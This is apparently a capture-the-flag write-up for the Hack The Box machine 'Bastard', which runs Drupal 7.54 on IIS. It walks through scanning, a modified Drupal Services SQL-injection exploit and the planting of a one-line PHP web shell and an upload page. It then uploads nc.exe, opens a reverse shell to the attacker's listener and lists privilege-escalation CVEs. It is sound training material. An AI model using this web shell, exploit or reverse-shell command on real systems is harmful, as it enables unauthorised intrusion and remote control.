Bastard
Contents
Ports scan
u505@kali:~/HTB/Machines/Bastard$ sudo masscan -e tun0 -p1-65535,U:1-65535 10.10.10.9 --rate=1000
Starting masscan 1.0.5 at 2020-03-10 14:03:52 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth Initiating SYN Stealth Scan Scanning 1 hosts [131070 ports/host] Discovered open port 49154/tcp on 10.10.10.9 Discovered open port 135/tcp on 10.10.10.9 Discovered open port 80/tcp on 10.10.10.9
u505@kali:~/HTB/Machines/Bastard$ nmap -sC -sV 10.10.10.9 Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-10 10:03 EDT Nmap scan report for bastard.htb (10.10.10.9) Host is up (0.037s latency). Not shown: 997 filtered ports PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 7.5 |_http-generator: Drupal 7 (http://drupal.org) | http-methods: |_ Potentially risky methods: TRACE | http-robots.txt: 36 disallowed entries (15 shown) | /includes/ /misc/ /modules/ /profiles/ /scripts/ | /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt | /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt |_/LICENSE.txt /MAINTAINERS.txt |_http-server-header: Microsoft-IIS/7.5 |_http-title: Welcome to 10.10.10.9 | 10.10.10.9 135/tcp open msrpc Microsoft Windows RPC 49154/tcp open msrpc Microsoft Windows RPC Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 67.79 seconds
Port 80
Dirsearch
u505@kali:~/HTB/Machines/Bastard$ python3 /opt/utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirb/common2.txt -e "txt,php" -f -t 10 -u "http://bastard.htb/" --plain-text-report=dirsearch.txt
_|. _ _ _ _ _ _|_ v0.3.9 (_||| _) (/_(_|| (_| )
Extensions: txt, php | HTTP method: get | Threads: 10 | Wordlist size: 13784
Error Log: /opt/utils/dirsearch/logs/errors-20-03-11_12-46-05.log
Target: http://bastard.htb/
[12:46:06] Starting: [12:46:16] 403 - 1KB - /.txt [12:46:16] 403 - 1KB - /.mysql_history/ [12:46:16] 403 - 1KB - /.bash_history.txt [12:46:16] 403 - 1KB - /.bash_history/ [12:46:16] 403 - 1KB - /.bashrc.php [12:46:16] 403 - 1KB - /.php [12:46:16] 403 - 1KB - /.bashrc.txt [12:46:16] 403 - 1KB - /.bash_history.php [12:46:16] 403 - 1KB - /.mysql_history.php [12:46:16] 403 - 1KB - /.mysql_history.txt [12:46:16] 403 - 1KB - /.bashrc/ [12:46:16] 403 - 1KB - /.passwd.txt [12:46:16] 403 - 1KB - /.passwd.php [12:46:16] 403 - 1KB - /.passwd/ [12:46:16] 403 - 1KB - /.profile.txt [12:46:16] 403 - 1KB - /.profile.php [12:46:16] 403 - 1KB - /.profile/ [12:46:16] 403 - 1KB - /.rhosts.txt [12:46:16] 403 - 1KB - /.rhosts.php [12:46:16] 403 - 1KB - /.rhosts/ [12:46:16] 403 - 1KB - /.sh_history.txt [12:46:16] 403 - 1KB - /.sh_history.php [12:46:16] 403 - 1KB - /.sh_history/ [12:46:16] 403 - 1KB - /.ssh.txt [12:46:16] 403 - 1KB - /.ssh.php [12:46:16] 403 - 1KB - /.ssh/ [12:49:36] 200 - 7KB - /0/ [12:54:36] 403 - 1KB - /admin/ [12:54:37] 403 - 1KB - /Admin/ [12:54:41] 403 - 1KB - /ADMIN/ [13:04:35] 403 - 1KB - /batch/ [13:12:19] 200 - 108KB - /changelog.txt [13:12:20] 200 - 108KB - /ChangeLog.txt [13:19:00] 200 - 1KB - /copyright.txt [13:20:40] 403 - 1KB - /cron.php [13:32:30] 403 - 1KB - /entries.txt [13:32:30] 403 - 1KB - /entries.php [13:32:30] 403 - 1KB - /entries/ [13:32:30] 403 - 1KB - /Entries.txt [13:32:30] 403 - 1KB - /Entries.php [13:32:31] 403 - 1KB - /Entries/ [13:50:09] 403 - 1KB - /includes/ [13:50:19] 200 - 7KB - /index.php [13:50:20] 200 - 7KB - /Index.php [13:51:34] 200 - 18KB - /install.txt [13:51:35] 200 - 2KB - /install.mysql.txt [13:51:35] 200 - 2KB - /install.pgsql.txt [13:51:37] 200 - 3KB - /install.php [13:58:44] 200 - 18KB - /license.txt [13:58:46] 200 - 18KB - /LICENSE.txt [14:03:20] 200 - 9KB - /maintainers.txt [14:07:02] 403 - 1KB - /misc/ [14:07:04] 403 - 1KB - /Misc/ [14:08:03] 403 - 1KB - /modules/ [14:12:03] 200 - 7KB - /node/ [14:27:39] 403 - 1KB - /profiles/ [14:31:59] 200 - 5KB - /readme.txt [14:32:01] 200 - 5KB - /Readme.txt [14:32:03] 200 - 5KB - /README.txt [14:35:51] 200 - 62B - /rest/ [14:36:40] 200 - 2KB - /robots.txt [14:39:29] 403 - 1KB - /scripts/ [14:39:31] 403 - 1KB - /Scripts/ [14:39:42] 403 - 1KB - /search/ [14:39:44] 403 - 1KB - /Search/ [14:45:31] 403 - 1KB - /sites/ [14:45:32] 403 - 1KB - /Sites/ [14:56:49] 403 - 1KB - /themes/ [14:56:50] 403 - 1KB - /Themes/ [15:02:09] 403 - 1KB - /update.php [15:02:17] 200 - 10KB - /upgrade.txt [15:03:02] 200 - 7KB - /user/ [15:14:01] 200 - 42B - /xmlrpc.php [15:14:05] 200 - 42B - /xmlrpc.php/
Task Completed
Robots.txt
u505@kali:~/HTB/Machines/Bastard$ curl http://bastard.htb/robots.txt # # robots.txt # # This file is to prevent the crawling and indexing of certain parts # of your site by web crawlers and spiders run by sites like Yahoo! # and Google. By telling these "robots" where not to go on your site, # you save bandwidth and server resources. # # This file will be ignored unless it is at the root of your host: # Used: http://example.com/robots.txt # Ignored: http://example.com/site/robots.txt # # For more information about the robots.txt standard, see: # http://www.robotstxt.org/robotstxt.html
User-agent: * Crawl-delay: 10 # CSS, JS, Images Allow: /misc/*.css$ Allow: /misc/*.css? Allow: /misc/*.js$ Allow: /misc/*.js? Allow: /misc/*.gif Allow: /misc/*.jpg Allow: /misc/*.jpeg Allow: /misc/*.png Allow: /modules/*.css$ Allow: /modules/*.css? Allow: /modules/*.js$ Allow: /modules/*.js? Allow: /modules/*.gif Allow: /modules/*.jpg Allow: /modules/*.jpeg Allow: /modules/*.png Allow: /profiles/*.css$ Allow: /profiles/*.css? Allow: /profiles/*.js$ Allow: /profiles/*.js? Allow: /profiles/*.gif Allow: /profiles/*.jpg Allow: /profiles/*.jpeg Allow: /profiles/*.png Allow: /themes/*.css$ Allow: /themes/*.css? Allow: /themes/*.js$ Allow: /themes/*.js? Allow: /themes/*.gif Allow: /themes/*.jpg Allow: /themes/*.jpeg Allow: /themes/*.png # Directories Disallow: /includes/ Disallow: /misc/ Disallow: /modules/ Disallow: /profiles/ Disallow: /scripts/ Disallow: /themes/ # Files Disallow: /CHANGELOG.txt Disallow: /cron.php Disallow: /INSTALL.mysql.txt Disallow: /INSTALL.pgsql.txt Disallow: /INSTALL.sqlite.txt Disallow: /install.php Disallow: /INSTALL.txt Disallow: /LICENSE.txt Disallow: /MAINTAINERS.txt Disallow: /update.php Disallow: /UPGRADE.txt Disallow: /xmlrpc.php # Paths (clean URLs) Disallow: /admin/ Disallow: /comment/reply/ Disallow: /filter/tips/ Disallow: /node/add/ Disallow: /search/ Disallow: /user/register/ Disallow: /user/password/ Disallow: /user/login/ Disallow: /user/logout/ # Paths (no clean URLs) Disallow: /?q=admin/ Disallow: /?q=comment/reply/ Disallow: /?q=filter/tips/ Disallow: /?q=node/add/ Disallow: /?q=search/ Disallow: /?q=user/password/ Disallow: /?q=user/register/ Disallow: /?q=user/login/ Disallow: /?q=user/logout/
Changelog file
The Changelog file informs us that the exact Drupal version is 7.54.
u505@kali:~/HTB/Machines/Bastard$ curl -s http://bastard.htb/CHANGELOG.txt | head
Drupal 7.54, 2017-02-01 ----------------------- - Modules are now able to define theme engines (API addition: https://www.drupal.org/node/2826480). - Logging of searches can now be disabled (new option in the administrative interface). - Added menu tree render structure to (pre-)process hooks for theme_menu_tree() (API addition: https://www.drupal.org/node/2827134). - Added new function for determining whether an HTTPS request is being served
Searchsploit
u505@kali:~/HTB/Machines/Bastard$ searchsploit "Drupal 7."
--------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
--------------------------------------------------------------------- ----------------------------------------
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Add Admin User) | exploits/php/webapps/34992.py
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Admin Session) | exploits/php/webapps/44355.php
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Passwo | exploits/php/webapps/34984.py
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Passwo | exploits/php/webapps/34993.php
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Remote Code Execut | exploits/php/webapps/35150.php
Drupal 7.12 - Multiple Vulnerabilities | exploits/php/webapps/18564.txt
Drupal 7.x Module Services - Remote Code Execution | exploits/php/webapps/41564.php
Drupal < 4.7.6 - Post Comments Remote Command Execution | exploits/php/webapps/3313.pl
Drupal < 7.34 - Denial of Service | exploits/php/dos/35415.txt
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code (Metaspl | exploits/php/webapps/44557.rb
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code Executio | exploits/php/webapps/44542.txt
Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote | exploits/php/webapps/44449.rb
Drupal Module CKEditor < 4.1WYSIWYG (Drupal 6.x/7.x) - Persistent Cr | exploits/php/webapps/25493.txt
Drupal Module Coder < 7.x-1.3/7.x-2.6 - Remote Code Execution | exploits/php/remote/40144.php
Drupal Module Cumulus 5.x-1.1/6.x-1.4 - 'tagcloud' Cross-Site Script | exploits/php/webapps/35397.txt
Drupal Module RESTWS 7.x - PHP Remote Code Execution (Metasploit) | exploits/php/remote/40130.rb
Drupal avatar_uploader v7.x-1.0-beta8 - Arbitrary File Disclosure | exploits/php/webapps/44501.txt
--------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result
Drupalgeddon vulnerability needs an authenticated user.
Drupal 7.x Module Services - Remote Code Execution
u505@kali:~/HTB/Machines/Bastard$ searchsploit -m 41564
Exploit: Drupal 7.x Module Services - Remote Code Execution
URL: https://www.exploit-db.com/exploits/41564
Path: /usr/share/exploitdb/exploits/php/webapps/41564.php
File Type: ASCII text, with CRLF line terminators
Copied to: /home/u505/HTB/Machines/Bastard/41564.php
Service module is a standardized solution for building API's so that external clients can communicate with Drupal. Basically, it allows anybody to build SOAP, REST, or XMLRPC endpoints to send and fetch information in several output formats. One of the feature of the module is that one can control the input/output format by changing the Content-Type/Accept headers. By default, the following input formats are allowed:
- application/xml
- application/json
- multipart/form-data
- application/vnd.php.serialized
The vulnerability consists on an SQL injection using UNION to login as one administrator with a fake hash. Once, logged as an administrator, the cache is altered to write a file in the server. The vulnerability finishes restoring the original cache.
Drupal exploitation to gain a reverse shell
The Drupla module service exploit allows to upload files to the server. We will use the exploit to upload 2 singles php programs. The first run commands and the second to upload the nc.exe file to the server. To do it, we need to determine the rest endpoint. The dirsearch snooped the rest folder.
The access to the folder rest gives us the endpoint.
Commands php
This PHP will execute commands send as parameter cmd.
u505@kali:~/HTB/Machines/Bastard$ cat u505_cmd.php <?php system($_GET["cmd"]); ?>
From the original script, we modify a few lines to load our file u505_cmd.php
u505@kali:~/HTB/Machines/Bastard$ head -n 20 41564_u505.php <?php
error_reporting(E_ALL);
define('QID', 'anything'); define('TYPE_PHP', 'application/vnd.php.serialized'); define('TYPE_JSON', 'application/json'); define('CONTROLLER', 'user'); define('ACTION', 'login');
$url = 'http://bastard.htb'; $endpoint_path = '/rest'; $endpoint = 'rest_endpoint';
$filecontent = file_get_contents('u505_cmd.php');
$file = [ 'filename' => 'u505_cmd.php', 'data' => $filecontent ];
The execution of the exploit gives:
u505@kali:~/HTB/Machines/Bastard$ php 41564_u505.php
Stored session information in session.json
Stored user information in user.json
Cache contains 7 entries
File written: http://bastard.htb/u505_cmd.php
Now, we can executes commands on the server
u505@kali:~/HTB/Machines/Bastard$ curl http://bastard.htb/u505_cmd.php?cmd=whoami
nt authority\iusr
Upload php
The vulnerability allows us to upload ascii files (php for example), but binaries files fails. This PHP allows us to upload any kind of files to the server.
u505@kali:~/HTB/Machines/Bastard$ cat u505_upload.php
Upload file
<?php
if(isset($_FILES['uploadfile'])){
$errors= array();
$file_name = $_FILES['uploadfile']['name'];
$file_size =$_FILES['uploadfile']['size'];
$file_tmp =$_FILES['uploadfile']['tmp_name'];
$file_type=$_FILES['uploadfile']['type'];
$file_ext=strtolower(end(explode('.',$_FILES['uploadfile']['name'])));
if(empty($errors)==true){
move_uploaded_file($file_tmp,$file_name);
echo "Success";
}else{
print_r($errors);
}
}
?>
<html>
<body>
<form action="" method="POST" enctype="multipart/form-data">
<input type="file" name="uploadfile" />
<input type="submit"/>
</form>
</body>
</html>
We do a few changes to upload the new php file.
u505@kali:~/HTB/Machines/Bastard$ head -n 20 41564_u505_upload.php <?php
error_reporting(E_ALL);
define('QID', 'anything'); define('TYPE_PHP', 'application/vnd.php.serialized'); define('TYPE_JSON', 'application/json'); define('CONTROLLER', 'user'); define('ACTION', 'login');
$url = 'http://bastard.htb'; $endpoint_path = '/rest'; $endpoint = 'rest_endpoint';
$filecontent = file_get_contents('u505_upload.php');
$file = [ 'filename' => 'u505_upload.php', 'data' => $filecontent ];
And we upload the php file with the vulnerability.
u505@kali:~/HTB/Machines/Bastard$ php 41564_u505_upload.php
Stored session information in session.json
Stored user information in user.json
Cache contains 7 entries
File written: http://bastard.htb/u505_upload.php
Upload nc.exe
u505@kali:~/HTB/Machines/Bastard$ cp /usr/share/windows-resources/binaries/nc.exe ./
u505@kali:~/HTB/Machines/Bastard$ curl http://bastard.htb/u505_cmd.php?cmd=dir Volume in drive C has no label. Volume Serial Number is 605B-4AAA
Directory of C:\inetpub\drupal-7.54
14/03/2020 09:39 ▒▒ <DIR> . 14/03/2020 09:39 ▒▒ <DIR> .. 19/03/2017 12:42 ▒▒ 317 .editorconfig 19/03/2017 12:42 ▒▒ 174 .gitignore 19/03/2017 12:42 ▒▒ 5.969 .htaccess 19/03/2017 12:42 ▒▒ 6.604 authorize.php 19/03/2017 12:42 ▒▒ 110.781 CHANGELOG.txt 19/03/2017 12:42 ▒▒ 1.481 COPYRIGHT.txt 19/03/2017 12:42 ▒▒ 720 cron.php 19/03/2017 12:43 ▒▒ <DIR> includes 19/03/2017 12:42 ▒▒ 529 index.php 19/03/2017 12:42 ▒▒ 1.717 INSTALL.mysql.txt 19/03/2017 12:42 ▒▒ 1.874 INSTALL.pgsql.txt 19/03/2017 12:42 ▒▒ 703 install.php 19/03/2017 12:42 ▒▒ 1.298 INSTALL.sqlite.txt 19/03/2017 12:42 ▒▒ 17.995 INSTALL.txt 19/03/2017 12:42 ▒▒ 18.092 LICENSE.txt 19/03/2017 12:42 ▒▒ 8.710 MAINTAINERS.txt 19/03/2017 12:43 ▒▒ <DIR> misc 19/03/2017 12:43 ▒▒ <DIR> modules 14/03/2020 09:39 ▒▒ 59.392 nc.exe 19/03/2017 12:43 ▒▒ <DIR> profiles 19/03/2017 12:42 ▒▒ 5.382 README.txt 19/03/2017 12:42 ▒▒ 2.189 robots.txt 19/03/2017 12:43 ▒▒ <DIR> scripts 19/03/2017 12:43 ▒▒ <DIR> sites 19/03/2017 12:43 ▒▒ <DIR> themes 14/03/2020 09:18 ▒▒ 31 u505_cmd.php 14/03/2020 09:28 ▒▒ 718 u505_upload.php 19/03/2017 12:42 ▒▒ 19.986 update.php 19/03/2017 12:42 ▒▒ 10.123 UPGRADE.txt 19/03/2017 12:42 ▒▒ 2.200 web.config 19/03/2017 12:42 ▒▒ 417 xmlrpc.php 24 File(s) 277.402 bytes 9 Dir(s) 30.808.170.496 bytes free
Reverse shell
Raise the listener
u505@kali:~/HTB/Machines/Bastard$ rlwrap nc -lvnp 4444 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::4444 Ncat: Listening on 0.0.0.0:4444
Now we will send the command nc 10.10.14.21 4444 -e cmd to the server <8we need to URL encode it).
u505@kali:~/HTB/Machines/Bastard$ curl http://bastard.htb/u505_cmd.php?cmd=nc.exe%2010.10.14.21%204444%20%2De%20cmd
And the reverse shell is opened.
u505@kali:~/HTB/Machines/Bastard$ rlwrap nc -lvnp 4444 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::4444 Ncat: Listening on 0.0.0.0:4444 Ncat: Connection from 10.10.10.9. Ncat: Connection from 10.10.10.9:49179. Microsoft Windows [Version 6.1.7600] Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\inetpub\drupal-7.54>whoami whoami nt authority\iusr
User Flag
C:\inetpub\drupal-7.54>type C:\Users\dimitris\Desktop\user.txt type C:\Users\dimitris\Desktop\user.txt <USER_FLAG>
Elevation of privileges
Systeminfo
C:\inetpub\drupal-7.54>systeminfo systeminfo
Host Name: BASTARD OS Name: Microsoft Windows Server 2008 R2 Datacenter OS Version: 6.1.7600 N/A Build 7600 OS Manufacturer: Microsoft Corporation OS Configuration: Standalone Server OS Build Type: Multiprocessor Free Registered Owner: Windows User Registered Organization: Product ID: 00496-001-0001283-84782 Original Install Date: 18/3/2017, 7:04:46 ▒▒ System Boot Time: 14/3/2020, 8:49:56 ▒▒ System Manufacturer: VMware, Inc. System Model: VMware Virtual Platform System Type: x64-based PC Processor(s): 2 Processor(s) Installed. [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz [02]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018 Windows Directory: C:\Windows System Directory: C:\Windows\system32 Boot Device: \Device\HarddiskVolume1 System Locale: el;Greek Input Locale: en-us;English (United States) Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul Total Physical Memory: 2.047 MB Available Physical Memory: 1.599 MB Virtual Memory: Max Size: 4.095 MB Virtual Memory: Available: 3.624 MB Virtual Memory: In Use: 471 MB Page File Location(s): C:\pagefile.sys Domain: HTB Logon Server: N/A Hotfix(s): N/A Network Card(s): 1 NIC(s) Installed. [01]: Intel(R) PRO/1000 MT Network Connection Connection Name: Local Area Connection DHCP Enabled: No IP address(es) [01]: 10.10.10.9
The system is a Windows server 2008 R2 without any patch.
Windows Exploit Suggester
This system has 207 vulnerabilities and 47 are classified as Elevation of privileges.
u505@kali:~/HTB/Machines/Bastard$ wes systeminfo.txt -i "Elevation of Privilege" Windows Exploit Suggester 0.98 ( https://github.com/bitsadmin/wesng/ ) [+] Parsing systeminfo output [+] Operating System - Name: Windows Server 2008 R2 for x64-based Systems - Generation: 2008 R2 - Build: 7600 - Version: None - Architecture: x64-based - Installed hotfixes: None [+] Loading definitions - Creation date of definitions: 20200221 [+] Determining missing patches [+] Filtering duplicate vulnerabilities [+] Applying display filters [+] Found vulnerabilities
Date: 20110712 CVE: CVE-2011-1282 KB: KB2507938 Title: Vulnerabilities in Windows Client/Server Run-time Subsystem Could Allow Elevation of Privilege Affected product: Windows Server 2008 R2 for x64-based Systems Affected component: Severity: Important Impact: Elevation of Privilege Exploit: n/a
Date: 20110712 CVE: CVE-2011-1283 KB: KB2507938 Title: Vulnerabilities in Windows Client/Server Run-time Subsystem Could Allow Elevation of Privilege Affected product: Windows Server 2008 R2 for x64-based Systems Affected component: Severity: Important Impact: Elevation of Privilege Exploit: n/a
Date: 20110712 CVE: CVE-2011-1281 KB: KB2507938 Title: Vulnerabilities in Windows Client/Server Run-time Subsystem Could Allow Elevation of Privilege Affected product: Windows Server 2008 R2 for x64-based Systems Affected component: Severity: Important Impact: Elevation of Privilege Exploit: n/a
Date: 20110712 CVE: CVE-2011-1285 KB: KB2507938 Title: Vulnerabilities in Windows Client/Server Run-time Subsystem Could Allow Elevation of Privilege Affected product: Windows Server 2008 R2 for x64-based Systems Affected component: Severity: Important Impact: Elevation of Privilege Exploit: n/a
Date: 20111213 CVE: CVE-2011-3408 KB: KB2620712 Title: Vulnerability in Windows Client/Server Run-time Subsystem Could Allow Elevation of Privilege Affected product: Windows Server 2008 R2 for x64-based Systems Affected component: Severity: Important Impact: Elevation of Privilege Exploit: n/a
Date: 20110913 CVE: CVE-2011-1984 KB: KB2571621 Title: Vulnerability in WINS Could Allow Elevation of Privilege Affected product: Windows Server 2008 R2 for x64-based Systems Affected component: Severity: Important Impact: Elevation of Privilege Exploit: n/a
Date: 20130108 CVE: CVE-2013-0003 KB: KB2742598 Title: Vulnerabilities in .NET Framework Could Allow Elevation of Privilege Affected product: Windows Server 2008 R2 for x64-based Systems Affected component: Microsoft .NET Framework 3.5.1 Severity: Important Impact: Elevation of Privilege Exploit: n/a
Date: 20130108 CVE: CVE-2013-0003 KB: KB2756920 Title: Vulnerabilities in .NET Framework Could Allow Elevation of Privilege Affected product: Windows Server 2008 R2 for x64-based Systems Affected component: Microsoft .NET Framework 3.5.1 Severity: Important Impact: Elevation of Privilege Exploit: n/a
Date: 20120214 CVE: CVE-2012-0149 KB: KB2645640 Title: Vulnerabilities in Ancillary Function Driver Could Allow Elevation of Privilege Affected product: Windows Server 2008 R2 for x64-based Systems Affected component: Severity: Important Impact: Elevation of Privilege Exploit: n/a
Date: 20120612 CVE: CVE-2012-0217 KB: KB2709715 Title: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege Affected product: Windows Server 2008 R2 for x64-based Systems Affected component: Severity: Important Impact: Elevation of Privilege Exploits: https://www.exploit-db.com/exploits/28718/, https://www.exploit-db.com/exploits/46508/
Date: 20130409 CVE: CVE-2013-1293 KB: KB2840149 Title: Vulnerabilities in Kernel-Mode Driver Could Allow Elevation Of Privilege Affected product: Windows Server 2008 R2 for x64-based Systems Affected component: Severity: Important Impact: Elevation of Privilege Exploit: n/a
Date: 20130409 CVE: CVE-2013-1293 KB: KB2808735 Title: Vulnerabilities in Kernel-Mode Driver Could Allow Elevation Of Privilege Affected product: Windows Server 2008 R2 for x64-based Systems Affected component: Severity: Important Impact: Elevation of Privilege Exploit: n/a
Date: 20101214 CVE: CVE-2010-3338 KB: KB2305420 Title: Vulnerability in Task Scheduler Could Allow Elevation of Privilege Affected product: Windows Server 2008 R2 for x64-based Systems Affected component: Severity: Important Impact: Elevation of Privilege Exploit: n/a
Date: 20130409 CVE: CVE-2013-1294 KB: KB2813170 Title: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege Affected product: Windows Server 2008 R2 for x64-based Systems Affected component: Severity: Important Impact: Elevation of Privilege Exploit: n/a
Date: 20100810 CVE: CVE-2010-2554 KB: KB982799 Title: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege Affected product: Windows Server 2008 R2 for x64-based Systems Affected component: Severity: Important Impact: Elevation of Privilege Exploit: n/a
Date: 20110208 CVE: CVE-2011-0091 KB: KB2425227 Title: Vulnerabilities in Kerberos Could Allow Elevation of Privilege Affected product: Windows Server 2008 R2 for x64-based Systems Affected component: Severity: Important Impact: Elevation of Privilege Exploit: n/a
Date: 20130409 CVE: CVE-2013-1292 KB: KB2840149 Title: Vulnerabilities in Kernel-Mode Driver Could Allow Elevation Of Privilege Affected product: Windows Server 2008 R2 for x64-based Systems Affected component: Severity: Important Impact: Elevation of Privilege Exploit: n/a
Date: 20130409 CVE: CVE-2013-1292 KB: KB2808735 Title: Vulnerabilities in Kernel-Mode Driver Could Allow Elevation Of Privilege Affected product: Windows Server 2008 R2 for x64-based Systems Affected component: Severity: Important Impact: Elevation of Privilege Exploit: n/a
Date: 20130409 CVE: CVE-2013-1291 KB: KB2840149 Title: Vulnerabilities in Kernel-Mode Driver Could Allow Elevation Of Privilege Affected product: Windows Server 2008 R2 for x64-based Systems Affected component: Severity: Important Impact: Elevation of Privilege Exploit: n/a
Date: 20130409 CVE: CVE-2013-1291 KB: KB2808735 Title: Vulnerabilities in Kernel-Mode Driver Could Allow Elevation Of Privilege Affected product: Windows Server 2008 R2 for x64-based Systems Affected component: Severity: Important Impact: Elevation of Privilege Exploit: n/a
Date: 20120612 CVE: CVE-2012-1515 KB: KB2709715 Title: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege Affected product: Windows Server 2008 R2 for x64-based Systems Affected component: Severity: Important Impact: Elevation of Privilege Exploit: n/a
Date: 20130212 CVE: CVE-2013-0073 KB: KB2789644 Title: Vulnerability in .NET Framework Could Allow Elevation of Privilege Affected product: Windows Server 2008 R2 for x64-based Systems Affected component: Microsoft .NET Framework 3.5.1 Severity: Important Impact: Elevation of Privilege Exploit: n/a
Date: 20130212 CVE: CVE-2013-0076 KB: KB2790113 Title: Vulnerability in Windows Client/Server Run-time Subsystem (CSRSS) Could Allow Elevation of Privilege Affected product: Windows Server 2008 R2 for x64-based Systems Affected component: Severity: Important Impact: Elevation of Privilege Exploit: n/a
Date: 20120214 CVE: CVE-2012-0148 KB: KB2645640 Title: Vulnerabilities in Ancillary Function Driver Could Allow Elevation of Privilege Affected product: Windows Server 2008 R2 for x64-based Systems Affected component: Severity: Important Impact: Elevation of Privilege Exploit: n/a
Date: 20130108 CVE: CVE-2013-0008 KB: KB2778930 Title: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege Affected product: Windows Server 2008 R2 for x64-based Systems Affected component: Severity: Important Impact: Elevation of Privilege Exploit: http://www.exploit-db.com/exploits/24485
Date: 20130108 CVE: CVE-2013-0004 KB: KB2742598 Title: Vulnerabilities in .NET Framework Could Allow Elevation of Privilege Affected product: Windows Server 2008 R2 for x64-based Systems Affected component: Microsoft .NET Framework 3.5.1 Severity: Important Impact: Elevation of Privilege Exploit: n/a
Date: 20130108 CVE: CVE-2013-0004 KB: KB2756920 Title: Vulnerabilities in .NET Framework Could Allow Elevation of Privilege Affected product: Windows Server 2008 R2 for x64-based Systems Affected component: Microsoft .NET Framework 3.5.1 Severity: Important Impact: Elevation of Privilege Exploit: n/a
Date: 20130108 CVE: CVE-2013-0001 KB: KB2742598 Title: Vulnerabilities in .NET Framework Could Allow Elevation of Privilege Affected product: Windows Server 2008 R2 for x64-based Systems Affected component: Microsoft .NET Framework 3.5.1 Severity: Important Impact: Elevation of Privilege Exploit: n/a
Date: 20130108 CVE: CVE-2013-0001 KB: KB2756920 Title: Vulnerabilities in .NET Framework Could Allow Elevation of Privilege Affected product: Windows Server 2008 R2 for x64-based Systems Affected component: Microsoft .NET Framework 3.5.1 Severity: Important Impact: Elevation of Privilege Exploit: n/a
Date: 20130108 CVE: CVE-2013-0002 KB: KB2742598 Title: Vulnerabilities in .NET Framework Could Allow Elevation of Privilege Affected product: Windows Server 2008 R2 for x64-based Systems Affected component: Microsoft .NET Framework 3.5.1 Severity: Important Impact: Elevation of Privilege Exploit: n/a
Date: 20130108 CVE: CVE-2013-0002 KB: KB2756920 Title: Vulnerabilities in .NET Framework Could Allow Elevation of Privilege Affected product: Windows Server 2008 R2 for x64-based Systems Affected component: Microsoft .NET Framework 3.5.1 Severity: Important Impact: Elevation of Privilege Exploit: n/a
Date: 20100810 CVE: CVE-2010-2555 KB: KB982799 Title: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege Affected product: Windows Server 2008 R2 for x64-based Systems Affected component: Severity: Important Impact: Elevation of Privilege Exploit: n/a
Date: 20130409 CVE: CVE-2013-1284 KB: KB2813170 Title: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege Affected product: Windows Server 2008 R2 for x64-based Systems Affected component: Severity: Important Impact: Elevation of Privilege Exploit: n/a
Date: 20130312 CVE: CVE-2013-1285 KB: KB2807986 Title: Vulnerabilities in Kernel-Mode Drivers Could Allow Elevation Of Privilege Affected product: Windows Server 2008 R2 for x64-based Systems Affected component: Severity: Important Impact: Elevation of Privilege Exploit: n/a
Date: 20130312 CVE: CVE-2013-1286 KB: KB2807986 Title: Vulnerabilities in Kernel-Mode Drivers Could Allow Elevation Of Privilege Affected product: Windows Server 2008 R2 for x64-based Systems Affected component: Severity: Important Impact: Elevation of Privilege Exploit: n/a
Date: 20130312 CVE: CVE-2013-1287 KB: KB2807986 Title: Vulnerabilities in Kernel-Mode Drivers Could Allow Elevation Of Privilege Affected product: Windows Server 2008 R2 for x64-based Systems Affected component: Severity: Important Impact: Elevation of Privilege Exploit: n/a
Date: 20130409 CVE: CVE-2013-1283 KB: KB2840149 Title: Vulnerabilities in Kernel-Mode Driver Could Allow Elevation Of Privilege Affected product: Windows Server 2008 R2 for x64-based Systems Affected component: Severity: Important Impact: Elevation of Privilege Exploit: n/a
Date: 20130409 CVE: CVE-2013-1283 KB: KB2808735 Title: Vulnerabilities in Kernel-Mode Driver Could Allow Elevation Of Privilege Affected product: Windows Server 2008 R2 for x64-based Systems Affected component: Severity: Important Impact: Elevation of Privilege Exploit: n/a
Date: 20110208 CVE: CVE-2011-0043 KB: KB2425227 Title: Vulnerabilities in Kerberos Could Allow Elevation of Privilege Affected product: Windows Server 2008 R2 for x64-based Systems Affected component: Severity: Important Impact: Elevation of Privilege Exploit: n/a
Date: 20110208 CVE: CVE-2011-0045 KB: KB2393802 Title: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege Affected product: Windows Server 2008 R2 for x64-based Systems Affected component: Severity: Important Impact: Elevation of Privilege Exploit: n/a
